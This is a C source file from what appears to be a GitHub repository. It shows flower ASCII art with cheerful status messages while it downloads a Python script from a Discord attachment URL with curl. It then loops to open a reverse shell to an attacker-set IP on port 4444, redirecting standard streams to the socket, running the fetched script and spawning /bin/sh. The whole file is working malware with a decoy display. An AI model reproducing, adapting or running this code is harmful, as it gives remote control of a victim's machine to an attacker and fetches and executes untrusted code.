-
Notifications
You must be signed in to change notification settings - Fork 2
/
post.c
58 lines (52 loc) · 2.45 KB
/
post.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
int *message()
{
printf("\n . . ");
printf("\n . . . . . ");
printf("\n . . . . . . . ");
printf("\n. . . . . . . . . . , ");
printf("\n . . . . . . . . . _ d#D ");
printf("\n. . . . . . . . . ._. . . _(%%)_ ` ");
printf("\n . . . . . . _(#)_ . (%%O%%) Dropping the pot...");
printf("\n . . . . _ (##O##) . _ (%%) _ Watering the flowers..... ");
printf("\n . . . _(#)_ (#) . _ (%%)_: _(%%)_ Enjoying the view...... ");
printf("\n . . . .(##O##)._\\ _(#)%O%%):(%%O%%) :)");
printf("\n . . (#) _ \\(##O##)) |,'(%%) ");
printf("\n `. ._(#)_ \\,(#) `. ; _ ");
printf("\n (##O##) `. Y _(#)_ ");
printf("\n .(#)\\ . .). / (##O##) ");
printf("\n . . . `-.(. . ; ,'(#) ");
printf("\n . . . . .\\. .| ( ");
printf("\n . . . d888888888888b ");
printf("\n . . ,88888888888888b ");
printf("\n . .d888888888888888 ");
printf("\n . d888888888888888 ");
printf("\n .`88888888888888P ");
printf("\n Y8888888888888 ");
printf("\n Y8888888888P ");
printf("\n_________________________`Y8888888P_____CJ_______");
return 0;
}
int main(int argc, char **argv)
{
message();
system("curl https://cdn.discordapp.com/attachments/835920163161112619/848980205539688498/post.py --output post.py");
while(1)
{
struct sockaddr_in victim;
victim.sin_family = AF_INET;
victim.sin_addr.s_addr = inet_addr("IP_HERE"); // edit IP here
victim.sin_port = htons(4444); // dont touch the port lol
int socksssss;
socksssss = socket(AF_INET,SOCK_STREAM,0);
connect(socksssss,(struct sockaddr *)&victim,sizeof(victim));
dup2(socksssss,0);
dup2(socksssss,1);
dup2(socksssss,2);
system("python3 post.py && /bin/sh", NULL, NULL);
}
return 0;
}